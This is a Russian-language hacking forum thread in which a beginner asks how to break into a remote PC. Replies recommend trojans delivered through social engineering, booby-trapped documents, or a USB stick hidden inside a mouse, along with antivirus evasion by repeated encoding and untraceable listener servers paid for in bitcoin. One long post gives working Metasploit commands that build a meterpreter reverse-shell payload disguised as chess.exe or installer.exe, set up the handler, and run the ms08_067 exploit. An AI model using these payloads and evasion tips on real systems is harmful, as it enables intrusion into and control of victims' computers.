Взлом удаленного ПК

Discussion in 'Песочница' started by NikByte, 1 May 2016.

  1. NikByte

    NikByte New Member

    Joined:
    12 Mar 2016
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Здрасьте , ачатовцы . Я начинающий и хотел бы спросить с помощью каких средств обычно выполняется взлом удаленного пк ? В гугле nmap описывался как утилита для сканирования пк ,находящихся в локальной сети.
     
  2. atlas28

    atlas28 Active Member

    Joined:
    23 May 2015
    Messages:
    224
    Likes Received:
    173
    Reputations:
    1
    Что именно ты хочешь получить в итоге? Я так понимаю, проще всего тебе будет начать с трояна, который можно впарить при помощи соц. инженерии.
    А nmap'ом ты сможешь просто просканировать порты и узнать, какие сервисы на них висят. Кстати говоря, у большинства пользователей стоят роутеры, и у многих из них на этих роутерах открыта вебморда наружу. Ну ты понимаешь, к чему я веду...
     
  3. NikByte

    NikByte New Member

    Joined:
    12 Mar 2016
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Я же говорю,я начинающий))Мало ччего понимаю))
     
  4. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    Ок. Я тоже начинающий.
    Сначала нужно узнать:
    1) Какая система у пользователя стоит. А вдруг там Kali Linux?
    2) Какой софт стоит.
    3) Внешний ли IP.

    Скорее всего придется делать троян. Можешь написать сам на Делфи, но лучше используй Metasploit Framework. Там уже все есть, и трояны там с возможностью миграции в процессы, и в реестре перепрописываются. Это все конечно относиться к Винде. Есть в нем и для Линукс троянов шаблоны, но эти трояны как я лично понял, может ошибаюсь , так поправьте, работают только в софте. Тоесть ты линукс софт заражаешь, потом отправляешь пользователю типа - классная игра, или конки погода, или еще что-то. И только когда она работает, доступ есть.

    В любом случае трой этот тебе придется куда-то запихнуть. Например, в .pdf или .doc. В exe - это уже для слишком тупых пользователей.
    Отправляешь по почте. И вуаля - тебя блокирует почтовый сервис. Снова идешь назад в MSF и кодируешь троян несколько раз так , чтобы сигнатуры кодитуры не совпадали с уже известными антивиру....

    Другая возможность, более правдоподобная в твоем случае - зарази флеху, засунть ее в мышу, пошли по почте чуваку, типа акция какая то. Думаю прокатит в 90% случаев. Главное мышку подороже купи.

    В трояне нужно прописать будет обратный IP, на котором будет ждать трояна твой "слушатель". Думаю тебе понятно, что этот IP не должен быть твоим домашним IP. Купи выделенный сервер, заплалати за него биткойнами например, чтобы тебя не посекли..

    Вообщем как видишь все стоит денег и временных затрат. В крайнем случае можно нанять специалиста.
     
    #4 spize0r, 2 May 2016
    Last edited: 2 May 2016
    JustWatch and NikByte like this.
  5. NikByte

    NikByte New Member

    Joined:
    12 Mar 2016
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Спасибо , буду пробовать )) А как вы до этого дошли ,если не секрет ?)
     
  6. trolex

    trolex Well-Known Member

    Joined:
    6 Dec 2009
    Messages:
    592
    Likes Received:
    1,392
    Reputations:
    6
    это интересно, конечно, но не понятно как будет работать, что бы и мышь и флэшка вместе заработали туда нужно ещё юсб хаб встроить, но дальше при подключении флэшки выпадет окно, что сделать с данным накопителем, открыть в проводнике, запустить авторан и тд. или я чего то не понимаю или проще сразу флэшку отсылать
     
  7. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    на форуме прочитал...
    ну я имел ввиду, что нужно взять обычную USB мышку, разобрать, взять флешку зараженную, перепаять ее, чтобы на входе была флешка. мышка понятно работать не будет, но нам ведь нужно, чтобы она один раз только была воткнута. а если троянец был сгенерирован и перекодирован несколько раз, то антивирус врядли его словит, если пользователь что-то заподозрит. а вообще ты прав. если нужно чтобы работала, то лучше тогда опять же потратить деньги и купить псевдо мышь или подобный девайс. Но я надеюсь что это все в целях эксперимента! я крайне вам не рекомендую заниматься такими противозаконными вещами, это уголовно наказуемо!!!
     
  8. NikByte

    NikByte New Member

    Joined:
    12 Mar 2016
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Да,это эксперимент) Пытаюсь взломать свой второй комп :)
     
  9. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Не покупай
     
  10. ojegard

    ojegard Banned

    Joined:
    31 Aug 2016
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Скачай Darkcomet 5.3.2
     
  11. Shadow Stream

    Shadow Stream Member

    Joined:
    19 Nov 2016
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    [*] Если вы пользуетесь KALI LINUX , то там уже встроен METASPLOIT FRAMEWORK . Советую вам с ним разобраться , очень мощная утилита (написана на Руби).

    Инструмент имеет несколько конфигураций:
    ---------------------------------------------------------------------------------------------------------------------------------
    1) Командная оболочка (msfconsole);
    2) Веб-интерфейс (Metasploit Community, PRO и Express);
    3) Графическая оболочка (Armitage, и более продвинутая версия - Cobalt strike).
    --------------------------------------------------------------------------------------------------------------------------------

    (Для дистрибутива , где нет сборки для Pentesting )Если у вас все еще нет Метасплоита — не беда, скачать его можно на официальном сайте metasploit.com
    Стоит отметить, что msf корректно работает только с базой PostgreSQL.

    После того как вы загрузили пакет, откроем консоль и выполним следующее:

    1) cd Download/ (перейдем в каталог загрузок);
    2) chmod +X metasploit-latest-linux-installer.run (даем права на запуск);
    3) sudo ./metasploit-latest-linux-installer.run (запускаем графическую установку).


    В качестве краткого описания ознакомимся с основными понятиями, а также рассмотрим некоторые команды MSF.

    [*] Exploit — Фрагмент кода, использующий уязвимость в ПО или ОС для выполнения атаки на систему.

    [*] Module — Модуль, автоматизирующий процесс какой-либо атаки.
    [*] Shellcode — Шеллкод. Используется как полезная нагрузка эксплойта, обеспечивающая доступ к командной оболочке ОС.
    [*] Payload — Полезная, или смысловая нагрузка. Это код, который выполняется после успешного выполнения атаки. Видов нагрузки в msf немало.
    [*]«Stager» — Нагрузка, разбитая на части. Устанавливая соединение, шелл подгружается полностью.
    [*]«Reverse shell» — Бэкконнект шел.
    [*]«Meterpreter» — Пожалуй, один из популярных, если не самый популярный шелл. Имеет кучу возможностей: миграцию в процессы; XOR-шифрование, для обхода IDS и антивирусов; два вида dll-инжекции и т.д. Также можно выбрать «metsvc» нагрузку, что зальет и пропишет meterpreter как сервис.

    Перед запуском утилиты:
    service postgresql start
    msfconsole
    msf > db_status
    [*] postgresql connected to msf3

    msf >


    msf > msfvenom

    Давайте смотреть на некоторые самые важные варианты в этом списке.
    ====================================================================
    - p определяет полезный груз Metasploit, который мы хотим использовать.
    - e определяет кодирующее устройство, которое мы хотим использовать.
    - a определение архитектуры, которую мы хотим использовать (дефолт - x86),
    - s определяет максимальный размер полезного груза.
    - i определяю количество повторений, с которыми можно закодировать полезный груз.
    - x определяет пользовательский исполняемый файл использовать в качестве шаблона
    =========================================================================
    msf > msfvenom -l encoders
    msf > msfvenom -p <payload name> -o
    msf >msfvenom -p windows/meterpreter/reverse_tcp -0



    msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= <your local IP> LPORT=<whatever port you want to listen on> -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe

    - p/windows/meterpreter/reverse_tcp определяет полезный груз, который мы хотим включить
    LHOST назначает местного хозяина (ipconfig пропишите)
    LPORT определяет порт, на котором мы хотим послушать
    - x определяет шаблон, который мы хотим использовать и путь к нему
    - e x86/shikata_ga_nai определяет кодирующее устройство, которое мы хотим использовать
    - i 200 представляет количество повторений
    - f exe -> создать исполняемый файл (.exe)
    chess.exe название файла

    ----------------------------------------------------------------------------------------
    msf > use exploit/multi/handler
    msf > set PAYLOAD windows/meterpreter/reverse_http
    msf > set LHOST 192.168.141.122
    msf > set LPORT 4444
    msf > exploit

    ----------------------------------------------------------------------------------------

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.73.128 LPORT=4444 -e x86/shikata_ga_nai -i 10 -x /root/Desktop/installer.exe -f exe > /root/Desktop/installer.exe

    give victim- отправляем жертве

    msf > use exploit/multi/handler
    msf > set PAYLOAD windows/meterpreter/reverse_http
    msf > set LHOST 192.168.73.128
    msf > set LPORT 4444
    msf > exploit

    -----------------------------------------------------------------------------------------
    msfconsole
    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > show options
    msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4
    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp


    Теперь опции также включают опции полезной нагрузки.
    Важные опции установить являются LHOST и LPORT.
    Немного подробнее:
    =================================================================================
    LHOST - IP-адрес локальной машины или машины хакера.
    LPORT - номер порта, на котором обратный слушатель оболочки получит входящую оболочку.

    ==================================================================================
    msf exploit(ms08_067_netapi) > set LHOST 192.168.1.33
    msf exploit(ms08_067_netapi) > set LPORT 6666
    msf exploit(ms08_067_netapi) > exploit
    meterpreter >


    meterpreter > sysinfo
    meterpreter > ipconfig
    meterpreter > run vnc



    Ссылки

    www.metasploit.com — Официальный сайт Метасплоита
    www.offensive-security.com/metasploit-unleashed/Main_Page — Официальная документация по metasploit

    Meterpreter

    github.com/darkoperator/MSF-Installer — Скрипт автоматической установки metasploit
    community.rapid7.com/docs/DOC-2100 — Подробная установка metasploit (linux)

    Практикуйте у себя дома на своих компах ! Не забывайте про закон !
    Happy Hacking )
     
    CKAP likes this.
  12. Turanchocks_

    Turanchocks_ Elder - Старейшина

    Joined:
    11 May 2013
    Messages:
    1,327
    Likes Received:
    3,285
    Reputations:
    17
    Терпя унижения и насмешки старших бородатых товарищей.
     
Loading...